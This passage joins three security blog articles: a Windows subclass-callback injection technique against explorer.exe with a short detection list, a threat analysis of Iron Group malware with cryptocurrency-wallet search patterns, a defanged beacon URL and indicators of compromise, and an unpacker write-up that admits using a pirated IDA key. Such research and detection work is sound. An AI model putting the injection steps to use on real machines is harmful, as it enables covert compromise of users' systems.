   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis

In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code. We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.

During the past year and a half, the Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

In this technical blog post we are going to take a look at the malware samples found during the research.

Technical Analysis:

Installer:

** This installer sample (and in general most of the samples found) is protected with VMProtect then compressed using UPX.

Installation process:

1. Check if the binary is executed on a VM, if so – ExitProcess

2. Drop & Install malicious chrome extension
%localappdata%\Temp\chrome.crx
3. Extract malicious chrome extension to %localappdata%\Temp\chrome & create a scheduled task to execute %localappdata%\Temp\chrome\sec.vbs.
4. Create mutex using the CPU’s version to make sure there’s no existing running instance of itself.
5. Drop backdoor dll to %localappdata%\Temp\\<random>.dat.
6. Check OS version:
.If Version == Windows XP then just invoke ‘Launch’ export of Iron Backdoor for a one-time non persistent execution.
.If Version > Windows XP
-Invoke ‘Launch’ export
-Check if Qhioo360 – only if not proceed, Install malicious certificate used to sign Iron Backdoor binary as root CA.Then create a service called ‘helpsvc’ pointing back to Iron Backdoor dll.

Using the leaked HackingTeam source code:

Once we Analyzed the backdoor sample, we immediately noticed it’s partially based on HackingTeam’s source code for their Remote Control System hacking tool, which leaked about 3 years ago. Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam’s source in both IronStealer and Iron ransomware.

1.Anti-VM: Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant leaked source code. This piece of code supports detecting Cuckoo Sandbox, VMWare product & Oracle’s VirtualBox. Screenshot:

 

2. Dynamic Function Calls: Iron Backdoor is also using the DynamicCall module from HackingTeam’s “core” library. This module is used to dynamically call external library function by obfuscated the function name, which makes static analysis of this malware more complex.
In the following screenshot you can see obfuscated “LFSOFM43/EMM” and “DsfbufGjmfNbqqjohB”, which represents “kernel32.dll” and “CreateFileMappingA” API.

For a full list of obfuscated APIs you can visit obfuscated_calls.h.

Malicious Chrome extension:

A patched version of the popular Adblock Plus chrome extension is used to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.


**patched include.preload.js injects two malicious scripts from the attacker’s Pastebin account.

The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it as you can see in the following screenshot:

Internet Explorer(deprecated):

Iron Backdoor itself embeds adblockplusie – Adblock Plus for IE, which is modified in a similar way to the malicious chrome extension, injecting remote javascript. It seems that this functionality is no longer automatically used for some unknown reason.

Persistence:

Before installing itself as a Windows service, the malware checks for the presence of either 360 Safe Guard or 360 Internet Security by reading following registry keys:

.SYSTEM\CurrentControlSet\Services\zhudongfangyu.
.SYSTEM\CurrentControlSet\Services\360rp

If one of these products is installed, the malware will only run once without persistence. Otherwise, the malware will proceed to installing rouge, hardcoded root CA certificate on the victim’s workstation. This fake root CA supposedly signed the malware’s binaries, which will make them look legitimate.

Comic break: The certificate is protected by the password ‘caonima123’, which means “f*ck your mom” in Mandarin.

IronStealer (<RANDOM>.dat):

Persistent backdoor, dropper and cryptocurrency theft module.

1. Load Cobalt Strike beacon:
The malware automatically decrypts hard coded shellcode stage-1, which in turn loads Cobalt Strike beacon in-memory, using a reflective loader:

Beacon: hxxp://dazqc4f140wtl.cloudfront[.]net/ZZYO

2. Drop & Execute payload: The payload URL is fetched from a hardcoded Pastebin paste address:

We observed two different payloads dropped by the malware:

1. Xagent – A variant of “JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms. JbossMiner is using known database vulnerabilities to spread. “Xagent” is the original filename Xagent<VER>.exe whereas <VER> seems to be the version of the worm. The last version observed was version 6 (Xagent6.exe).

**Xagent versions 4-6 as seen by VT

2. Iron ransomware – We recently saw a shift from dropping Xagent to dropping Iron ransomware. It seems that the wallet & payment portal addresses are identical to the ones that Bart observed. Requested ransom decreased from 0.2 BTC to 0.05 BTC, most likely due to the lack of payment they received.

**Nobody paid so they decreased ransom to 0.05 BTC

3. Stealing cryptocurrency from the victim’s workstation: Iron backdoor would drop the latest voidtool Everything search utility and actually silent install it on the victim’s workstation using msiexec. After installation was completed, Iron Backdoor uses Everything in order to find files that are likely to contain cryptocurrency wallets, by filename patterns in both English and Chinese.

Full list of patterns extracted from sample:
– Wallet.dat
– UTC–
– Etherenum keystore filename
– *bitcoin*.txt
– *比特币*.txt
– “Bitcoin”
– *monero*.txt
– *门罗币*.txt
– “Monroe Coin”
– *litecoin*.txt
– *莱特币*.txt
– “Litecoin”
– *Ethereum*.txt
– *以太币*.txt
– “Ethereum”
– *miner*.txt
– *挖矿*.txt
– “Mining”
– *blockchain*.txt
– *coinbase*

4. Hijack on-going payments in cryptocurrency: IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account:

Pastebin Account:

As part of the investigation, we also tried to figure out what additional information we may learn from the attacker’s Pastebin account:

The account was probably created using the mail fineisgood123@gmail[.]com – the same email address used to register blockbitcoin[.]com (the attacker’s crypto-mining pool & malware host) and swb[.]one (Old server used to host malware & leaked files. replaced by u.cacheoffer[.]tk):

1. Index.html: HTML page referring to a fake Firefox download page.
2. crystal_ext-min + angular: JS inject using malicious Chrome extension.
3. android: This paste holds a command line for an unknown backdoored application to execute on infected Android devices. This command line invokes remote Metasploit stager (android.apk) and drops cpuminer 2.3.2 (minerd.txt) built for ARM processor. Considering the last update date (18/11/17) and the low number of views, we believe this paste is obsolete.

4. androidminer: Holds the cpuminer command line to execute for unknown malicious android applications, at the time of writing this post, this paste received nearly 2000 hits.

Aikapool[.]com is a public mining pool and port 7915 is used for DogeCoin:

The username (myapp2150) was used to register accounts in several forums and on Reddit. These accounts were used to advertise fake “blockchain exploit tool”, which infects the victim’s machine with Cobalt Strike, using a similar VBScript to the one found by Malwrologist (ps5.sct).

XAttacker: Copy of XAttacker PHP remote file upload script.
miner: Holds payload URL, as mentioned above (IronStealer).

FAQ:

How many victims are there?
It is hard to define for sure, , but to our knowledge, the total of the attacker’s pastes received around 14K views, ~11K for dropped payload URL and ~2k for the android miner paste. Based on that, we estimate that the group has successfully infected, a few thousands victims.

Who is Iron group?
We suspect that the person or persons behind the group are Chinese, due in part to the following findings:
. There were several leftover comments in the plugin in Chinese.
. Root CA Certificate password (‘f*ck your mom123’ was in Mandarin)
We also suspect most of the victims are located in China, because of the following findings:
. Searches for wallet file names in Chinese on victims’ workstations.
. Won’t install persistence if Qhioo360(popular Chinese AV) is found

IOCS:

 

  • blockbitcoin[.]com
  • pool.blockbitcoin[.]com
  • ssl2.blockbitcoin[.]com
  • xmr.enjoytopic[.]tk
  • down.cacheoffer[.]tk
  • dzebppteh32lz.cloudfront[.]net
  • dazqc4f140wtl.cloudfront[.]net
  • androidapt.s3-accelerate.amazonaws[.]com
  • androidapt.s3-accelerate.amazonaws[.]com
  • winapt.s3-accelerate.amazonaws[.]com
  • swb[.]one
  • bitcoinwallet8[.]com
  • blockchaln[.]info
  • 6350a42d423d61eb03a33011b6054fb7793108b7e71aee15c198d3480653d8b7
  • a4faaa0019fb63e55771161e34910971fd8fe88abda0ab7dd1c90cfe5f573a23
  • ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9
  • 654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190
  • 980a39b6b72a7c8e73f4b6d282fae79ce9e7934ee24a88dde2eead0d5f238bda
  • 39a991c014f3093cdc878b41b527e5507c58815d95bdb1f9b5f90546b6f2b1f6
  • a3c8091d00575946aca830f82a8406cba87aa0b425268fa2e857f98f619de298
  • 0f7b9151f5ff4b35761d4c0c755b6918a580fae52182de9ba9780d5a1f1beee8
  • ea338755e8104d654e7d38170aaae305930feabf38ea946083bb68e8d76a0af3
  • 4de16be6a9de62b1ff333dd94e63128e677eb6a52d9fbbe55d8a09a2cab161f1
  • 92b4eed5d17cb9892a9fe146d61787025797e147655196f94d8eaf691c34be8c
  • 6314162df5bc2db1200d20221641abaac09ac48bc5402ec29191fd955c55f031
  • 7f3c07454dab46b27e11fcefd0101189aa31e84f8498dcb85db2b010c02ec190
  • 927e61b57c124701f9d22abbc72f34ebe71bf1cd717719f8fc6008406033b3e9
  • f1cbacea1c6d05cd5aa6fc9532f5ead67220d15008db9fa29afaaf134645e9de
  • 1d34a52f9c11d4bf572bf678a95979046804109e288f38dfd538a57a12fc9fd1
  • 2f5fb4e1072044149b32603860be0857227ed12cde223b5be787c10bcedbc51a
  • 0df1105cbd7bb01dca7e544fb22f45a7b9ad04af3ffaf747b5ecc2ffcd8c6dee
  • 388c1aecdceab476df8619e2d722be8e5987384b08c7b810662e26c42caf1310
  • 0b8473d3f07a29820f456b09f9dc28e70af75f9dec88668fb421a315eec9cb63
  • 251345b721e0587f1f08f54a81e26abac075acf3c4473a2c3ba8efcedc3b2459
  • b1fe223cbb01ff2a658c8ff51d386b5df786fd36278ee081c714adf946145047
  • 2886e25a86a57355a8a09a84781a9b032de10c3e40339a9ad0c10b63f7f8e7c7
  • 1d17eb102e75c08ab6f54387727b12ec9f9ee1960c8e5dc7f9925d41a943cabf
  • 5831dabe27e0211028296546d4e637770fd1ec5f2c8c5add51d0ea09b6ea3f0d
  • 85b0d44f3e8fd636a798960476a1f71d6fe040fbe44c92dfa403d0d014ff66cc
  • 936f4ce3570017ef5db14fb68f5e775a417b65f3b07094475798f24878d84907
  • 484b4cd953c9993090947fbb31626b76d7eee60c106867aa17e408556d27b609
  • 1cbd51d387561cafddf10699177a267cd5d2d184842bb43755a0626fdc4f0f3c
  • e41a805d780251cb591bcd02e5866280f8a99f876cfa882b557951e30dfdd142
  • b8107197469839a82cae25c3d3b5c25b5c0784736ca3b611eb3e8e3ced8ec950
  • b0442643d321003af965f0f41eb90cff2a198d11b50181ef8b6f530dd22226a7
  • 657a3a4a78054b8d6027a39a5370f26665ee10e46673a1f4e822a2a31168e5f9
  • 5977bee625ed3e91c7f30b09be9133c5838c59810659057dcfd1a5e2cf7c1936
  • 9ea69b49b6707a249e001b5f2caaab9ee6f6f546906445a8c51183aafe631e9f
  • 283536c26bb4fd4ea597d59c77a84ab812656f8fe980aa8556d44f9e954b1450
  • 21f1a867fa6a418067be9c68d588e2eeba816bffcb10c9512f3b7927612a1221
  • 45f794304919c8aa9282b0ee84c198703a41cc2254fe93634642ada3511239d2
  • 70e47fdff286fdfe031d05488bc727f5df257eacaa0d29431fb69ce680f6fb0c
  • ce7161381a0a0495ef998b5e202eb3e8fa2945dfdba0fd2a612d68b986c92678
  • b8d548ab2a1ce0cf51947e63b37fe57a0c9b105b2ef36b0abc1abf26d848be00
  • 74e777af58a8ee2cff4f9f18013e5b39a82a4c4f66ea3e17d06e5356085265b7
  • cd4d1a6b3efb3d280b8d4e77e306e05157f6ef8a226d7db08ac2006cce95997c
  • 78a07502443145d762536afaabd4d6139b81ca3cc9f8c28427ec724a3107e17b
  • 729ab4ff5da471f210a8658f4a7b2a30522534a212ac44e4d76f258baab19ccb
  • ca0df32504d3cf78d629e33b055213df5f71db3d5a0313ebc07fe2c05e506826
  • fc9d150d1a7cbda2600e4892baad91b9a4b8c52d31a41fd686c21c7801d1dd8c
  • bf2984b866c449a8460789de5871864eec19a7f9cadd7d883898135a4898a38a
  • 9d817d77b651d2627e37c01037e13808e1047f9528799a435c7bc04e877d70b3
  • 8fdec2e23032a028b8bd326dc709258a2f705c605f6222fc0c1616912f246f91
  • dbe165a63ed14e6c9bdcd314cf54d173e68db9d36623b09057d0a4d0519f1306
  • 64f96042ab880c0f2cd4c39941199806737957860387a65939b656d7116f0c7e
  • e394b1a1561c94621dbd63f7b8ea7361485a1f903f86800d50bd7e27ad801a5f
  • 506647c5bfad858ff6c34f93c74407782abbac4da572d9f44112fee5238d9ae1
  • 194362ce71adcdfa0fe976322a7def8bb2d7fb3d67a44716aa29c2048f87f5bc
  • 3652ea75ce5d8cfa0000a40234ae3d955781bcb327eecfee8f0e2ecae3a82870
  • 97d41633e74eccf97918d248b344e62431b74c9447032e9271ed0b5340e1dba0
  • a8ab5be12ca80c530e3ef5627e97e7e38e12eaf968bf049eb58ccc27f134dc7f
  • 37bea5b0a24fa6fed0b1649189a998a0e51650dd640531fe78b6db6a196917a7
  • 7e750be346f124c28ddde43e87d0fbc68f33673435dddb98dda48aa3918ce3bd
  • fcb700dbb47e035f5379d9ce1ada549583d4704c1f5531217308367f2d4bd302
  • b638dcce061ed2aa5a1f2d56fc5e909aa1c1a28636605a3e4c0ad72d49b7aec6
  • f2e4528049f598bdb25ce109a669a1f446c6a47739320a903a9254f7d3c69427
  • afd7ab6b06b87545c3a6cdedfefa63d5777df044d918a505afe0f57179f246e9
  • 9b654fd24a175784e3103d83eba5be6321142775cf8c11c933746d501ca1a5a1
  • e6c717b06d7ded23408461848ad0ee734f77b17e399c6788e68bc15219f155d7
  • e302aa06ad76b7e26e7ba2c3276017c9e127e0f16834fb7c8deae2141db09542
  • d020ea8159bb3f99f394cd54677e60fadbff2b91e1a2e91d1c43ba4d7624244d
  • 36104d9b7897c8b550a9fad9fe2f119e16d82fb028f682d39a73722822065bd3
  • d20cd3e579a04c5c878b87cc7bd6050540c68fdd8e28f528f68d70c77d996b16
  • ee859581b2fcea5d4ff633b5e40610639cd6b11c2b4fc420720198f49fbd1d31
  • ef2c384c795d5ca8ce17394e278b5c98f293a76047a06fc672da38bb56756aec
  • bd56db8d304f36af7cb0380dcbbc3c51091e3542261affb6caac18fa6a6988ec
  • 086d989f14e14628af821b72db00d0ef16f23ba4d9eaed2ec03d003e5f3a96a1
  • f44c3fd546b8c74cc58630ebcb5bea417696fac4bb89d00da42202f40da31354
  • 320bb1efa1263c636702188cd97f68699aebbb88c2c2c92bf97a68e689fa6f89
  • 42faf3af09b955de1aead2b99a474801b2c97601a52541af59d35711fafb7c6d
  • 6e0adfd1e30c116210f469d76e60f316768922df7512d40d5faf65820904821b
  • eea2d72f3c9bed48d4f5c5ad2bef8b0d29509fc9e650655c6c5532cb39e03268
  • 1a31e09a2a982a0fedd8e398228918b17e1bde6b20f1faf291316e00d4a89c61
  • 042efe5c5226dd19361fb832bdd29267276d7fa7a23eca5ced3c2bb7b4d30f7d
  • 274717d4a4080a6f2448931832f9eeb91cc0cbe69ff65f2751a9ace86a76e670
  • f8751a004489926ceb03321ea3494c54d971257d48dadbae9e8a3c5285bd6992
  • d5a296bac02b0b536342e8fb3b9cb40414ea86aa602353bc2c7be18386b13094
  • 49cfeb6505f0728290286915f5d593a1707e15effcfb62af1dd48e8b46a87975
  • 5f2b13cb2e865bb09a220a7c50acc3b79f7046c6b83dbaafd9809ecd00efc49a
  • 5a5bbc3c2bc2d3975bc003eb5bf9528c1c5bf400fac09098490ea9b5f6da981f
  • 2c025f9ffb7d42fcc0dc8d056a444db90661fb6e38ead620d325bee9adc2750e
  • aaa6ee07d1c777b8507b6bd7fa06ed6f559b1d5e79206c599a8286a0a42fe847
  • ac89400597a69251ee7fc208ad37b0e3066994d708e15d75c8b552c50b57f16a
  • a11bf4e721d58fcf0f44110e17298f6dc6e6c06919c65438520d6e90c7f64d40
  • 017bdd6a7870d120bd0db0f75b525ddccd6292a33aee3eecf70746c2d37398bf
  • ae366fa5f845c619cacd583915754e655ad7d819b64977f819f3260277160141
  • 9b40a0cd49d4dd025afbc18b42b0658e9b0707b75bb818ab70464d8a73339d52
  • 57daa27e04abfbc036856a22133cbcbd1edb0662617256bce6791e7848a12beb
  • 6c54b73320288c11494279be63aeda278c6932b887fc88c21c4c38f0e18f1d01
  • ba644e050d1b10b9fd61ac22e5c1539f783fe87987543d76a4bb6f2f7e9eb737
  • 21a83eeff87fba78248b137bfcca378efcce4a732314538d2e6cd3c9c2dd5290
  • 2566b0f67522e64a38211e3fe66f340daaadaf3bcc0142f06f252347ebf4dc79
  • 692ae8620e2065ad2717a9b7a1958221cf3fcb7daea181b04e258e1fc2705c1e
  • 426bc7ffabf01ebfbcd50d34aecb76e85f69e3abcc70e0bcd8ed3d7247dba76e

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

